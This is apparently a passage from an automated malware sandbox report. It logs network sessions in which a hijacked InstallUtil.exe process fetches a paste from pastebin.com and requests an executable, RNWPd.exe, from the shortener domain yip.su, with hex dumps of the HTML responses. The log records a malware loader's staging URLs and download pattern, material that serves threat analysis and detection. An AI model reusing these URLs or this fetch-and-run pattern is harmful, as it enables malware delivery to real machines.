                                                2024-08-09 21:01:48 UTC1369INData Raw: 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 34 73
                                                Data Ascii: r:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:0.4s
                                                2024-08-09 21:01:48 UTC1369INData Raw: 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 3b 5f 79 2e
                                                Data Ascii: ntData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name);_y.
                                                2024-08-09 21:01:48 UTC1369INData Raw: 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d 72 61 64 69
                                                Data Ascii: e>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-radi
                                                2024-08-09 21:01:48 UTC1369INData Raw: 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64 6f 6d 61
                                                Data Ascii: gin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="doma
                                                2024-08-09 21:01:48 UTC152INData Raw: 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: osition='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                                                2024-08-09 21:01:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                22192.168.2.649745172.67.19.244434876C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-09 21:01:54 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                                Host: pastebin.com
                                                Connection: Keep-Alive
                                                2024-08-09 21:01:54 UTC222INHTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:01:54 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Frame-Options: SAMEORIGIN
                                                Server: cloudflare
                                                CF-RAY: 8b0aaf1ddc560f3e-EWR
                                                2024-08-09 21:01:54 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                2024-08-09 21:01:54 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                                Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                                2024-08-09 21:01:54 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                                Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                                2024-08-09 21:01:54 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                                Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                                2024-08-09 21:01:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                23192.168.2.649746188.114.96.34434876C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-09 21:01:54 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                                Host: yip.su
                                                Connection: Keep-Alive
                                                2024-08-09 21:01:55 UTC898INHTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:01:54 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                memory: 0.36196136474609375
                                                expires: Fri, 09 Aug 2024 21:01:54 +0000
                                                strict-transport-security: max-age=604800
                                                strict-transport-security: max-age=31536000
                                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                x-frame-options: SAMEORIGIN
                                                Cache-Control: max-age=14400
                                                CF-Cache-Status: EXPIRED
                                                Last-Modified: Fri, 09 Aug 2024 21:01:54 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZXwsgjwWdYZFdg9S50cHQm9zPIGv%2FfiK7jTFwYWUtyxE%2BpTyzfmqafTrwctY9QtXNDb9bHZPFf1lOi9p9IeJXaBfO1AmesBZrCBXodVphqCuOy2K0g2JfdY%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b0aaf21dee441a6-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-08-09 21:01:55 UTC471INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                                                Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                                                2024-08-09 21:01:55 UTC1369INData Raw: 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d
                                                Data Ascii: r" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property=
                                                2024-08-09 21:01:55 UTC1369INData Raw: 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e
                                                Data Ascii: lor:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:0.
                                                2024-08-09 21:01:55 UTC1369INData Raw: 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 3b 5f
                                                Data Ascii: gentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name);_
                                                2024-08-09 21:01:55 UTC1369INData Raw: 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d 72 61
                                                Data Ascii: yle>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-ra
                                                2024-08-09 21:01:55 UTC1369INData Raw: 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64 6f
                                                Data Ascii: argin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="do
                                                2024-08-09 21:01:55 UTC154INData Raw: 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: .position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                                                2024-08-09 21:01:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                24192.168.2.649747172.67.19.244434876C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-09 21:01:59 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                                Host: pastebin.com
                                                Connection: Keep-Alive
                                                2024-08-09 21:01:59 UTC222INHTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:01:59 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Frame-Options: SAMEORIGIN
                                                Server: cloudflare
                                                CF-RAY: 8b0aaf41bb4c43df-EWR
                                                2024-08-09 21:01:59 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                2024-08-09 21:01:59 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                                Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
